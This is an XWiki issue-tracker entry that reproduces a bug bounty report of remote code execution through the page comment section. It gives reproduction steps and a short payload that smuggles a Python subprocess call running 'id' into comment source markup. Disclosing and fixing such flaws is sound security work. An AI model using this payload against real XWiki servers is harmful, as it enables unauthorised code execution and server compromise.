Details
-
Bug
-
Resolution: Solved By
-
Blocker
-
4.2-milestone-1
-
Unknown
-
N/A
-
N/A
-
Description
SUBMISSION REFERENCES
- Submission code: XWIKI-R66ON85E
- Submission URL: https://www.intigriti.com/auth/dashboard?redirect=/submissions/e95a7ad5-7029-4627-abf0-3e3e3ea0b4ce/XWIKI-R66ON85E
RESEARCHER INFORMATION
- Submitter: renniepak
SUBMISSION INFORMATION
- Created at: Wed, 16 Nov 2022 11:12:24 GMT
- Submission status: Archived
REPORT CONTENT
- Severity: Exceptional (9.9)
- Domain: https://intigriti.xwiki.com/ (Url)
- Proof of concept: Hi XWiki team,
I found another RCE in the comments that can be executed by any unprivileged user.
-
- Reproduction
1. Login to Xwiki and navigate to a random page. For example: https://intigriti.xwiki.com/xwiki/bin/view/Help/
2. Append `?viewer=comments` to the url to view the comment section.
3. Click the `Comment` button and next the `Source` button.
4. Enter the following payload:
```
cachepython}}import subprocess as A;print(A.check_output('id', shell=True)){{/python/cache
```
5. Click `add comment`
-
- Result
The resulting page will execute the code and print it to screen.
{273319}- Impact: Any low privileged user can abuse this to run arbitrary code on the server. Doing so they can completely compromise the application and server and it's data.
- Personal data involved: No
- Endpoint: https://intigriti.xwiki.com/xwiki/bin/commentadd/Help/WebHome?viewer=comments
- Type: Remote Code Execution
- Attachments: Screenshot 2022-11-16 121022.png
Attachments
Issue Links
- duplicates
-
-
- Closed
-